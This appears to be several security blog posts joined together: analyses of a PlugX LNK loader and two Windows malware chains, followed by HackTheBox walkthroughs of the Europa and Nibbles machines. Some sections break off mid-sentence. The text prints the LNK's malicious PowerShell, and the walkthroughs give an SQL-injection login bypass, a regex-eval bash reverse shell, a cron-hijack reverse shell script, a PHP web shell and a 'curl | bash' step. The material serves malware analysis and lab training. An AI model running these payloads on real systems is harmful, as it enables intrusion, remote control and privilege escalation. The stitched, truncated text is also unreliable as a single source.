First Stage

It hasn’t been possible to identify the initial vector through which the sample was spread; however, the analysis indicates a phishing attack. The sample was delivered in a ZIP file, likely named BRICS Report.zip. To enhance its authenticity, the LNK file is disguised as a PDF. Additionally, at some point in the execution chain, it opens a decoy BRICS report.

The attack begins with a malicious LNK file that leverages ZDI-CAN-25373, a Windows shortcut vulnerability. This flaw enables the threat actor to execute commands stealthily by manipulating whitespace within the file structure. To observe all actions performed by the file, it was necessary to use Strings on the file.

> strings "BRICS Report.lnk"


pdf
-w H   -c  ";   ;$lxasggj = (Get-ChildItem -Pa $Home -Re -Inc *'BRICS Report'.zip).fullname;
$214632665758 = [System.IO.File]::OpenRead($lxasggj);
$njjrdrvxi = New-Object byte[] $214632665758.Length;
$214632665758.Read($njjrdrvxi, 0, $njjrdrvxi.Length);
$214632665758.Close();$btaydiyfud=714;
;
$ekglypm='WrITE'+'AlLB'+'YteS';[SysTem.IO.FIle]::$ekglypm($Env:appdata+'\\nrtzrghg.kq', $njjrdrvxi[$btaydiyfud..($btaydiyfud+1453568-1)]);
;
;
TaR -xvf $Env:APPDATA\nrtzrghg.kq -C $Env:Appdata;Sleep -Seconds 4;
;
cmd /c $Env:appdata\4FIA7XZ8-C3GX-N8RX-6S45-TGSJL9YODN94\steam_monitor.exe;"
.\WindowssSystem326Shell32.pdf
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Once executed, the LNK file launches a PowerShell script that extracts specific bytes from the ZIP file to create a TAR archive named nrtzrghg.kq in C:\Users\<User>\AppData\Roaming. The contents of this archive are then extracted into the directory 4FIA7XZ8-C3GX-N8RX-6S45-TGSJL9YODN94, revealing the legitimate executable steam_monitor.exe, the malicious DLL crashhandler.dll, and an encrypted payload crashlog.dat. Finally, steam_monitor.exe is executed.

Second Stage

The execution of steam_monitor.exe loads the malicious crashhandler.dll through the exported function CreateInterface.

The DLL implements obfuscated Windows API resolution to avoid exposing functions in the Import Address Table (IAT). The APIs are dynamically resolved as the code executes rather than being loaded at startup. Additionally, some of the resolved APIs are never used and appear to be intentionally included as noise to hinder analysis. The usefull ones are:

1. GetModuleFileNameW. Retrieves the full path of the current executable, used to resolve the location of crashlog.dat relative to it.
2. VirtualAlloc Reserves and commits a region of memory to stage the encrypted payload prior to execution.
3. NtCreateFile Opens a handle to crashlog.dat for reading.
4. NtQueryInformationFile Queries file metadata, specifically the file size, to determine how much data needs to be read into memory.
5. NtReadFile Reads the contents of crashlog.dat into the previously allocated memory region.
6. NtProtectVirtualMemory Modifies the memory protection of the allocated region, transitioning it to executable in preparation for execution.
7. CreateEvent Creates an unsignaled event object that will serve as the execution trigger.
8. RtlRegisterWait Registers the decrypted payload as a callback tied to the event object, delegating execution to the Windows Thread Pool.
9. SetEvent Signals the event, causing the Thread Pool to dispatch the callback and execute the payload.

Third Stage

The file crashlog.dat begins with a self-contained XOR decryption stub, keyed on 0x82, responsible for decrypting the remainder of the payload in-place prior to execution.

The main function retrieves the InMemoryOrderModuleList from the PEB to enumerate the loaded modules. For each module, it parses the export table and computes a hash over every exported name using a ROL-13 accumulation algorithm, comparing the result against hardcoded values to resolve the address of the target Win32 API without exposing any strings in plaintext.

The code introduces deliberate busy-loops to hinder dynamic analysis, significantly increasing the time required to step through execution in a debugger and disrupting the analyst’s ability to follow the control flow.

Following the execution flow, the malware proceeds to harvest information about the compromised system through some of the following calls and registry queries:

• GetWindowsDirectoryW — Retrieves the path to the Windows directory.
• GetSystemDirectoryW — Retrieves the path to the system directory.
• RtlGetVersion — Obtains the Windows version.
• QueryPerformanceCounter — Queries system performance metrics.
• GetSystemTime — Retrieves the current system time.
• GetTickCount — Retrieves the number of milliseconds elapsed since system startup.
• Software\Microsoft\Edge\BLBeacon — Reads the installed version of Microsoft Edge.

At a certain point in the execution flow, the malware resolves the path to C:\Users\<User>\AppData\Local\Temp via ExpandEnvironmentStringsW, where it drops and executes a decoy document Brics Report.pdf to deceive the victim into believing the interaction was legitimate.

As part of its cleanup routine, the malware first attempts to delete any pre-existing instance of tmp.dat in C:\Users\<User>\AppData\Local\Temp, ensuring a clean write, before dropping a fresh copy of crashlog.dat under that name, only to delete it shortly after. The purpose of the subsequent deletion remains unclear.

The malware creates a hidden directory named Steam under %PUBLIC%, where the three files bundled within the original package are subsequently dropped.

To establish persistence, the malware creates a registry value named SteamMonitor under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, setting its data to C:\Users\Public\Steam\steam_monitor.exe 918 743, ensuring the payload is executed automatically on every user logon.

The calls to GetCommandLineW and CommandLineToArgvW found earlier in the execution flow now make sense in this context, the arguments 918 743 passed via the registry Run key allow the malware to distinguish a persistence-triggered execution from its initial run, altering its behavior accordingly.

The malware also creates the registry key Software\Classes\ms-pu\CLSID. According to a WeLiveSecurity article, this key is used to store information about the compromised system — which aligns with the earlier observed behavior of the malware reading system performance metrics.

Following the information gathering phase, the malware prepares to establish a connection with its C2 server. To do so, it first queries Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable and Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer to determine whether a proxy configuration is in place. Once resolved, it initiates an initial beacon to the C2 (embwishes[.]com), signaling that the implant is active on the compromised host.

Subsequently, the malware encrypts the collected data and begins exfiltrating it to the C2 server.

Attribution

Based on the behavioral patterns and indicators observed throughout this analysis — including the use of PlugX/Korplug, the Software\Classes\ms-pu\CLSID registry key, the decoy PDF document, and the overall infection chain — this sample shares significant similarities with campaigns previously attributed to Mustang Panda, a China-nexus threat actor also tracked as BRONZE PRESIDENT and TA416.

This assessment is supported by two external reports: a WeLiveSecurity article documenting a PlugX variant used by Mustang Panda, and an Arctic Wolf report linking similar tooling to UNC6384, a cluster associated with the same actor.

Note: Attribution in threat intelligence is rarely definitive. The similarities described above are based on overlapping TTPs and tooling, and should be treated as an analytical assessment rather than a confirmed attribution.

🔍 Indicators of Compromise (IOCs)

SHA256 Hashes

e79d19d68d307c12413f8549aafa4a56776002dd04601e36e0125b2e6d56ff94 - BRICS Report.lnk 30c71d644bc72e0d55d46bed753ab3f72dc77b7f1be0e34693c957939a779507 - BRICS Report.zip 44cfba85aa27265779b01f6eb8b69718462b1ca8078b21066061e8d1622dff7a - crashhandler.dll 8c0051a83b3611ff2b669b670aa005633f3d9e844454a112b31d2a4bc944a234 - steam_monitor.exe 774841a2bfb07b61a8be3de8ae31e9847f987de652eef179761dc3d1b34c42ff - crashlog.dat a988b177b97038a080cb223ee32529ce2d26939a1aaa8e59e7e5fdf6c5fd8e20 - BRICS Report.pdf

URIs

embwishes[.]com
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0

I will be using DnSpy for disassembling and debugging the sample.

First Stage

First, we need to identify the programming language used by the sample to determine the appropriate tools for analysis. To do this, we’ll use Detect It Easy (DIE).

Now that we know the sample uses the .NET framework and is a 32-bit executable, we can statically analyze its structure for suspicious elements using DnSpy.

In the previous image, we can see two resources, gr and rDTN, both identified as bitmaps. However, these images display no visible content. This unusual behavior suggests that obfuscated code may be hidden within these bitmap resources. Additionally, we can see a Windows Forms application with several classes named in Portuguese (Brazilian).

Upon examining the code from the entry point, we reviewed the initialization of the previously mentioned classes. Within the Frm_Mascara class, we observe a function that utilizes the gr resource.

Important: In DnSpy, the assembly is highlighted in purple in the assembly tree, and within it, the entry point is clearly marked.

In the AggregateColorSequence function, we can observe a steganographic extraction technique that retrieves hidden bytes from the bitmap by iterating through each pixel and extracting data from the RGB color components (red, green, and blue channels)

Once the obfuscated executable is loaded as an assembly, we can see in the Modules window that the assembly has no backing file on disk—it exists only in memory. Additionally, by inspecting the type variable in the debugger, we can observe which class will be executed when CreateInstance is called. The variable reveals that execution will continue in the GameForm class within the PrescriptionManagement assembly.

Important: In dnSpy, the Modules section can be accessed via Debug > Windows > Modules.

Second Stage

Now in the second stage, we can see that function names are obfuscated to obscure their purpose. However, by examining the parameters these functions receive, we can identify some interesting ones.

Continuing with the execution flow previously mentioned, I set a breakpoint at the LowestBreakIterations function, which appears to be loading the second resource mentioned earlier rDTN as a bitmap.

Additionally, the Mist function implements a repeating-key XOR cipher. It receives the bitmap data as the encrypted payload to decrypt. The function derives a seed value from the last byte of this payload (XORed with 112), then decrypts each byte using XOR operations between the ciphertext byte, the corresponding key byte (cycling through the key), and the derived seed value.

Once we reach the end of the code (function ႣႨ), we can observe that it will use Invoke to load the assembly. By setting a breakpoint at this function, we can see the execution flow that will continue into the next assembly.

Third Stage

In this third stage, we have a DLL loaded in memory called VerticalBars.dll containing a large number of namespaces and classes, each with their own nested classes. This complex structure makes it significantly more difficult to trace the execution flow. Fortunately, we know that execution continues in the Mathematics namespace, specifically in the CalculatorTag class within the SolveHiddenObject function.

Following the code’s execution flow, VerticalBars.dll is loaded. This DLL contains a resource that appears to be another obfuscated payload.

The CatchTransformableContainer function implements a custom stream cipher that combines multiple cryptographic techniques. It uses the hardcoded key dYGbZXqjXVi to decrypt the payload. The algorithm decrypts each byte using XOR operations combined with arithmetic transformations and positional dependency by incorporating the next byte in the calculation: decrypted[i] = ((ciphertext[i] XOR key[i % key_length]) - ciphertext[(i+1) % length] + 256) % 256. Finally, it removes the last byte, which likely served as padding or a checksum.

Following the decryption process, the malware performs deobfuscation and calls GetRuntimeDirectory to obtain the .NET runtime directory path. It then executes MSBuild, injecting the malicious code into this legitimate process.

Now that everything is in place, it only needs to perform a simple code injection into the created process and load what constitutes the final stage of the malware.

Important: In the Local Variables window, we can select the ivk variable and view its bytes in the Memory window, allowing us to dump and save the file.

Final Stage

Using Detect It Easy (DIE) on the dumped executable, we can confirm that it is a .NET executable.

In this final executable, we can now see the code much more clearly. Here, the malware’s true purpose becomes evident: stealing sensitive information from the infected system, establishing keyloggers, and creating remote access sessions.

Something interesting is that it doesn’t use a mutex to prevent multiple instances. Instead, it enumerates all processes with the same name and terminates them.

The malware implements several evasion techniques to detect and avoid execution in analysis environments:

• CheckRemoteDebuggerPresent: Standard Windows API call to detect if a debugger is attached to the process.

• Sleep Timing Check: This method implements a timing-based debugger detection technique. It captures the current timestamp, calls Thread.Sleep(10) to pause execution for 10 milliseconds, and then measures the elapsed time. If the elapsed time is less than 10 ticks (which should be impossible under normal execution), it indicates that the sleep function was likely bypassed or accelerated—a common behavior in sandboxes and automated analysis environments that skip sleep calls to speed up analysis.

• Sandbox DLL Detection: This function checks for the presence of known sandbox-related DLLs in the process memory space. It searches for modules associated with popular sandboxing solutions:
  • SbieDll.dll - Sandboxie
  • SxIn.dll - Qihoo 360 Sandbox
  • Sf2.dll - Avast Sandbox
  • snxhk.dll - Avast
  • cmdvrt32.dll - Comodo Sandbox

  The function iterates through this list and uses GetModuleHandle to check if any of these DLLs are loaded. If any sandbox DLL is detected, it returns true, indicating the malware is running in a sandboxed environment.

• Virtual Machine Detection via WMI: This method employs Windows Management Instrumentation (WMI) to detect virtual machine environments. It queries two WMI classes:
  • Win32_ComputerSystem: Checks the manufacturer and model properties for indicators of virtualization (Microsoft Corporation with “VIRTUAL” in the model name for Hyper-V, VMware in the manufacturer, or VirtualBox in the model).
  • Win32_VideoController: Examines the video controller name for VMware or VirtualBox graphics adapters.

  If any virtualization indicators are found, or if an exception occurs during the WMI query, the function returns true, signaling that the malware is running in a VM.

• Cloud/Hosting Environment Detection: This function performs an external IP geolocation check using the ip-api.com service to determine if the infected machine is running on a hosting provider or cloud infrastructure. It sends an HTTP request to http://ip-api.com/line/?fields=hosting, which returns “true” if the IP address belongs to a known hosting provider or data center. This technique helps the malware avoid execution in cloud-based sandbox environments commonly used for malware analysis.

Finally, after stealing all available information from the compromised system and deploying various tools for remote access, the malware sends an email containing all the exfiltrated data to the attacker’s command and control server.

🔍 Indicators of Compromise (IOCs)

SHA256 Hashes

214f81361ecc2893d57465ef2c57662f7d60b2ea06408d6a40d6982f0c484e40 - ADaI.exe 35ced35bb7c27317cc69e6b5705dc4773cc45940d6847c2732a649c8260f1d8e - Vertical Bars.dll 3b23dbc0ffe3b17b88f560c2b93eb64af9e94beb88d123a4c811a427584f09bf - 46da3e76-ea11-4ef3-9ed6-348209ad609f.exe

I will be using x32dbg and ida for disassembling and debugging the sample.

First Stage

Firstly, I opened the sample main_bin.exe.bin (this was done to avoid directly opening the executable file and modifying extension).



As soon as I decompiled the code, I noticed that at the beginning, there was a function passing the DLL to LoadLibrary. Additionally, I observed another function that retrieved the name of a function to obtain a pointer using GetProcAddress, and then proceeded with further operations.

Since the functions used to retrieve those names were heavily obfuscated, making it difficult to obtain the names statically, I used x32dbg to capture the return values of the function sub_401300.

Important: To copy the addresses from IDA to x32dbg, I disabled ASLR, as the addresses would be different otherwise.

In the example above, you can see the result returned by the function in one of the cases. However, the results returned by the functions were as follows:

1. FindResourceA
2. LoadResource
3. SizeofResource
4. LockResource
5. VirtualAlloc

Once I spotted the FindResourceA function, I proceeded to PEStudio to examine the resources of the sample. I found one resource, but it appeared to be empty; it might be encrypted. To confirm if this was the resource being loaded, I checked the parameters on the stack when FindResourceA was called, and they matched.

Important: 0x65 is 101 in decimal.

After retrieving the resource information, it uses an RC4 algorithm to decrypt the code stored within the resource.



Then, using the same technique to conceal Windows API calls, the following APIs were identified in the following order:

1. CreateProcessA
2. VirtualAlloc
3. GetThreadContext
4. ReadProcessMemory
5. WriteProcessMemory
6. VirtualAllocEx
7. SetThreadContext
8. ResumeThread

By analyzing the order of the functions, I suspected that the decrypted payload was being written into the opened process—the same one I had previously examined. I identified the memory region where the data would be stored using the first VirtualAlloc and then continued the execution. This allowed me to observe the decrypted content.



I dumped the memory section where the payload was implanted with System Informer and began analyzing it.

Second Stage

In the second stage, I noticed that the code was more heavily obfuscated. To analyze it further, I set breakpoints on key functions within the main subroutine to inspect their return values, suspecting the use of API hashing for function resolution.



As observed above, we identified an anti-debugging technique using IsDebuggerPresent a Windows API that retrieves information from the PEB to detect the presence of a debugger. However, the call to IsDebuggerPresent was obfuscated using API hashing, making static analysis more difficult. While analyzing the pseudocode, I found another function implementing additional anti-analysis techniques. To bypass this, I modified the return value of IsDebuggerPresentand sub_401000 by setting EAX to 0.

At a certain point while analyzing the pointers, I noticed that svchost.exe was being attached to our process. This prompted me to investigate the functions more thoroughly. During my examination, I identified the creation of the svchost.exe process, suggesting potential process injection or manipulation.



Once the process was created, it allocated a region of memory to store a new executable within itself. However, this wasn’t what caught my attention—it was the interaction with svchost.exe. When I identified a VirtualAllocEx call allocating memory in that process, I confirmed it was svchost.exe by analyzing the handle.



To verify my hypothesis, I attached the process to x32dbg and set a breakpoint on the allocated memory region. I also attempted to dump the newly allocated memory, but since static analysis wasn’t feasible, I proceeded with dynamic analysis instead.

Following this, I anticipated a WriteProcessMemory call. If I couldn’t find it, I planned to look for a ResumeThread or simply wait until the memory region was populated. Eventually, one of my breakpoints hit WriteProcessMemory and CreateRemoteThread, and I continued executing within svchost.exe.

Third Stage

After analyzing the payload dynamically, I discovered obfuscated functions from WININET.DLL. To gather IoCs, I examined the contacted URL and the User-Agent used.



Here we have the User-Agent and the URL visited:

• User-Agent: cruloader
• URL: https://pastebin[.]com/raw/mLem9DGk

And the URL accessed was:

Europa is a medium-friendly difficulty machine on HackTheBox, offers a diverse range of topics that can pose both a challenge and an opportunity for learning. While it doesn’t require an extensive number of steps, it provides a rich learning experience in various aspects of enumeration and attack vectors. Our journey starts with enumeration, where careful attention to certificates will enable us to apply virtualization. Next, we’ll encounter SQL Injection and regex injection challenges. Finally, the grand finally awaits with a privilege escalation , where we’ll dive into modifying cron task code.

VPN connection

To begin exploring the Europa machine, we use the following one-liner to run OpenVpn with the specified VPN file:

    sudo openvpn {vpnFile}

Remember to replace {vpnFile} with the actual filename of the OpenVPN configuration file. The command allows us to establish a secure VPN connection and gain acces to the target network.

Portscan

We utilized the tool Nmap to perform a scan on the target IP address:

$ sudo nmap 10.10.10.22 -p- -sS --min-rate 5000

Let’s break down each part of the command:

• sudo: We used sudoto execute Nmap with elevated privileges.
• nmap: This command help us to explore the ports on the machine.
• -p-: The flag -p- instructs Nmap to scall all 65535 ports.
• -sS: The flag -sSenables TCP SYN scan.
• --min-rate 5000: We set the minimun sending rate to 5000 packets per second.

After executing the command, Nmap show us that there are two ports open.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 22:08 CEST
Host is up (0.13s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Output:
After executing the command, Nmap will begin scanning all the 65535 ports on the target IP address. The output will display a detailed report, listing the open ports and services found.



Now we perform a targeted scan on the specific ports and using additional options for enhanced information gathering:

$ sudo nmap 10.10.10.22 -p 22,80,443 -sCV -sS --min-rate 5000

Let’s delve into the new parts of the command:

• -p 22,80: We use the -p flag to specify the ports we want to scan.
• -sCV: The -sCV option combines two scan types:
  • -sC: This option enables the default script scan. THis will identify vulnerabilities and gather additional information.
  • -sV: This option enables version detection. Nmap will try to determine the version of the service.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 22:15 CEST
Nmap scan report for 10.10.10.22
Host is up (0.23s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b55420af7068c67c0e25c05db09fb78 (RSA)
|   256 b1ea5ec41c0a969e93db1dad22507475 (ECDSA)
|_  256 331f168dc024785f5bf56d7ff7b4f2e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
| tls-alpn: 
|_  http/1.1

Output:
After executing the command, Nmap will specifically scan ports 22, 80 and 443 on the target IP address. The output will present a report, including the services running on the port, versions and vulnerabilities.

If we pay attention there is ssl certificate on the port 443 that provides us some relevant information:

ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb

An SSL certificate is found with a specific Subject Alternative Name(SAN), like in this case admin-portal.europacorp.htb and www.europacorp.htb, meaning that these domains are associated with the server on port 443.

Important: An SSL Certificate (Secure Sockets Layer Certificate) is a digital certificate that authenticates the identity of a website and establishes an encrypted connection between the web server and the user’s browser. It ensures that the data transmitted between the user’s and the server remains secure and confidential.

It is probable that these domains are used to configure the virtual machines. By adding these domains to the /etc/hosts file, we are performing a local redirect on our machine to the IP address associated with the especified domains. We need to add:

10.10.10.22 europacorp.htb  admin-portal.europacorp.htb

To avoid problems with the virtualization it is good to have a line break with the other addresses.

Website

If we pay a look on both pages (http://europacorp.htband https://admin-portal.europacorp.htb), only https://admin-portal.europacorp.htb has relevant information:

Important: If you encounter a warning message when accessing the website, it might be due to a self-signel SSL certificate. Don’t worry! A self-signed certificate is created by the website itself and not a trusted Certificate Authority(CA).

Firstly, we start using default credentials, I recommend using admin, however, here we have to use an email, so I recommend using the domain name so the email could be something like: admin@europacorp.htb. Regarding the password, I recommend using pass,password, root and root123, however, none of them seem to work.

Let’s try now, some SQL Injection, to check if we can do SQL injection we need to put ' or any other special character. In that way, by adding the ' character(single quote) as part of the payload in an input field like username or password, if the applciation does not handle the input correctly, it may cause a syxtax error in the SQL query.

Let’s open BurpSuite to check if we can modify the fields of the username and password to check if it is vulnerable to SQL injection.We send the petition to the repeater to play with the request and check if we can get access.

Important: Burpsuite is a powerful web security testing tool that helps find and fix vulnerabilities in web application. It allows to intercept and inspect web traffic, identify potential security flaws, and analyse how data is handled by the application.

As we can see in the image we have a SQL syxtax error, so it is vulnerable to SQL injection. In that case I encourage to test different injection from here to test if we can get access as admin.

After several attemps trying different injection, I tried ' or 1=1 limit 1 -- -+ and I got access as the admin.

Important: The SQL injection should encode using URL because the Content-Type of the request says that we need to have the data encoded with URL instead of sending the data in plaintext.

Now that we have access we need to pay attention on the tool, where we can have a VPN config generator, let’s take a closer look using Burpsuite:

It seems we are using Regex expressions to modify the IP address, let’s take about of Regex to do Remote Execution of Code(RCE). In this article teaches us how to exploit the regex expressions.

Let’s modify the data of the request and let’s add that:

pattern=/ip_address/e&ipaddress=system('bash+-c+"bash+-i+>%26+/dev/tcp/{IP}/{Port}+0>%261"')&text=/ip_address/ 

We need to substitute {IP} with our IP and the {Port} with the port we are going to here.

In a final terminal, we run the following command to listen for the incoming reverse shell connection: nc -nvlp {Port} I need to wait for the connection from the server, and once established, I gain interactive access to the target system’s shell.

Finally, we get access to the machine!!!

Privilege Scalation

After using doing a research to find any way to find a way to scalate privileges, we find a strange cron task:

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *	root	/var/www/cronjobs/clearlogs

Important: Cron jobs are automated processes that run periodically on Unix systems. They can be a vulnerability if an attacker can modify the content of a cron job, allowin them to execute malicious commands with elevated privileges.

We find a task that is executed each minute /var/www/cronjobs/clearlogs, let’s take a look to that file.

It seems that clearlogs doesn’t allow us to write on the file, however it includes an interesting line that allow us to execute a file as root:

#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

It seems that the logcleared.sh is executed as root, however, there is no file in the machine with that name, so we can created and we add that on the file:

#!/bin/sh
bash -i >& /dev/tcp/{IP}/{Port} 0>&1

Finally, we open a new terminal, where we will run the command to listen for the incoming reverse shell connection:

nc -nvlp {Port}

Nibbles is a begginer-friendly machine on HackTheBox, designed to provide an excellent entry point for those new to ethical hacking and penetration testing. It offers a realistic environment to practise skills and tackle challenges in a controlled setting. As you explore and conquer its challenges, you’ll develop essential skills and gain a deeper understanding of penetration testing techniques. In this machine we do enumeration, web application testing, exploitation, privilege escalation and capture the flag.

VPN connection

To begin exploring the Nibbles machine, we use the following one-liner to run OpenVpn with the specified VPN file:

    sudo openvpn {vpnFile}

Remember to replace {vpnFile} with the actual filename of the OpenVPN configuration file. The command allows us to establish a secure VPN connection and gain acces to the target network.

Portscan

We utilized the tool Nmap to perform a scan on the target IP address:

$ sudo nmap 10.10.10.75 -p- -sS --min-rate 5000

Let’s break down each part of the command:

• sudo: We used sudoto execute Nmap with elevated privileges.
• nmap: This command help us to explore the ports on the machine.
• -p-: The flag -p- instructs Nmap to scall all 65535 ports.
• -sS: The flag -sSenables TCP SYN scan.
• --min-rate 5000: We set the minimun sending rate to 5000 packets per second.

After executing the command, Nmap show us that there are two ports open.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:46 CEST
Nmap scan report for 10.10.10.75
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Output: After executing the command, Nmap will begin scanning all the 65535 ports on the target IP address. The output will display a detailed report, listing the open ports and services found.



Now we perform a targeted scan on the specific ports and using additional options for enhanced information gathering:

$ sudo nmap 10.10.10.75 -p 22,80 -sCV -sS --min-rate 5000

Let’s delve into the new parts of the command:

• -p 22,80: We use the -p flag to specify the ports we want to scan.
• -sCV: The -sCV option combines two scan types:
  • -sC: This option enables the default script scan. THis will identify vulnerabilities and gather additional information.
  • -sV: This option enables version detection. Nmap will try to determine the version of the service.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:56 CEST
Nmap scan report for 10.10.10.75
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Output: After executing the command, Nmap will specifically scan ports 22 and 80 on the target IP address. The output will present a report, including the services running on the port, versions and vulnerabilities.

Website

The design of the page is quite simple, so let’s start by looking at the code of the page before listing directories.

It seems we found something interesting hid on the code;)

<b>Hello world!</b>














<!-- /nibbleblog/ directory. Nothing interesting here! -->

Shortcut To view the page source code, press `CTRL+U.

In the new page (http://10.10.10.75/nibbleblog/), there is nothing interesting. Let’s try to find out new directories to see if there is something interesting.


Firstly, I starting Fuzzing on http://10.10.10.75/nibbleblog/
The command we use to fuzzing is:

wfuzz -c -t 200 --hc=404 -w  /opt/SecLists/directory-list-2.3-medium.txt http://10.10.10.75/nibbleblog/FUZZ.php

Important Fuzzing is a testing technique used to discover vulnerabilities and defects in programs or systems. It involves sending a large amount of random input data to the target a>

Let’s explain the command:

• wfuzz: wfuzzis a flexible and web application fuzzer.
• -c: This option stands for “colorize output”.
• -t 200: The -t option specifies the number of threads to use during the fuzzing process.
• --hc=404: This option is used to specify the response status code to hide from the output.
• -w /opt/SecLists/directory-list-2.3-medium.txt: The -w option specifies the wordlist file to use for fuzzing. In that case I used one that is here:[Dictionary](https://github.com/dan>
• http://10.10.10.75/nibbleblog/FUZZ.php: This is the target URL that will be fuzzed. The FUZZ placeholder will be replaced with each directory name from the worlists during the fuzzing pr>

Important When adding .php at the end of the wfuzzcommand, you are trying to identify the programming language used by the web application. by appending .phpto the URLs being fuzzed, you are attemting to find PHP files.

Output

000000259:   200        26 L     96 W       1401 Ch     "admin" 

There is one interesting page! Let’s see admin.php(http://10.10.10.75/nibbleblog/admin.php).

It seems we need a credential and a password. Let’s look around maybe we find something.

However with that it is not enough, so I started fuzzing on http://10.10.10.75/nibbleblog/ and I got interesting results.

We need to do fuzzing again:

wfuzz -c -t 200 --hc=404 -w /opt/SecLists/directory-list-2.3-medium.txt http://10.10.10.75/nibbleblog/FUZZ

Output

000000075:   301        9 L      28 W       323 Ch      "content" 
000000259:   301        9 L      28 W       321 Ch      "admin"                         
000000519:   301        9 L      28 W       323 Ch      "plugins"                       
000000127:   301        9 L      28 W       322 Ch      "themes"                        
000000935:   301        9 L      28 W       325 Ch      "languages"                     
000000897:   200        63 L     643 W      4624 Ch     "README"   

If we go to content there is a private directory where there are interesting information, specially in config.xml

<config>
<name type="string">Nibbles</name>
<slogan type="string">Yum yum</slogan>
<footer type="string">Powered by Nibbleblog</footer>
<advanced_post_options type="integer">0</advanced_post_options>
<url type="string">http://10.10.10.75/nibbleblog/</url>
<path type="string">/nibbleblog/</path>
<items_rss type="integer">4</items_rss>
<items_page type="integer">6</items_page>
<language type="string">en_US</language>
<timezone type="string">UTC</timezone>
<timestamp_format type="string">%d %B, %Y</timestamp_format>
<locale type="string">en_US</locale>
<img_resize type="integer">1</img_resize>
<img_resize_width type="integer">1000</img_resize_width>
<img_resize_height type="integer">600</img_resize_height>
<img_resize_quality type="integer">100</img_resize_quality>
<img_resize_option type="string">auto</img_resize_option>
<img_thumbnail type="integer">1</img_thumbnail>
<img_thumbnail_width type="integer">190</img_thumbnail_width>
<img_thumbnail_height type="integer">190</img_thumbnail_height>
<img_thumbnail_quality type="integer">100</img_thumbnail_quality>
<img_thumbnail_option type="string">landscape</img_thumbnail_option>
<theme type="string">simpler</theme>
<notification_comments type="integer">1</notification_comments>
<notification_session_fail type="integer">0</notification_session_fail>
<notification_session_start type="integer">0</notification_session_start>
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
<notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
<seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
<seo_site_description type="string"/>
<seo_keywords type="string"/>
<seo_robots type="string"/>
<seo_google_code type="string"/>
<seo_bing_code type="string"/>
<seo_author type="string"/>
<friendly_urls type="integer">0</friendly_urls>
<default_homepage type="integer">0</default_homepage>
</config>

If we pay attention there is a line with some relevant information:

<notification_email_to type="string">admin@nibbles.com</notification_email_to>

Let’s try to check if the user could be admin and the password is nibbles

WE GET IT!!!

Now, we need to try to get a reverse shell, so let’s go to plugins to upload some code and we can see that we can upload a file on My image. Let’s try to do a Remote Code Execution(RCE) by uploading a PHP file with that code:

<?php system($_REQUEST['cmd']); ?>

Important In the provided code, the system()function is used, which allows the execution of shell commands. The $REQUEST["cmd"] variable retrieves the value of the cmd parameter from the HTTP request, which contains the shell command the attacker wants to execute.

Now, we need to find on the directories we found doing fuzzing and try to search something called “my_image” and we get it on /nibbleblog/content/private/plugins/my_image.

If we click on our file and we add at the end of the PHP file that ?cmd=(http://10.10.10.75/nibbleblog/content/private/plugins/my_image/), we will get a cmd where we can add commands. In my case I am going to do a reverse shell to make everything more comfortable.

In this reverse shell I used 3 windows where in each I used different tools:

1. RCE payload:
   • I execute the following RCE payload in the web application:

      curl {IP} | bash
     

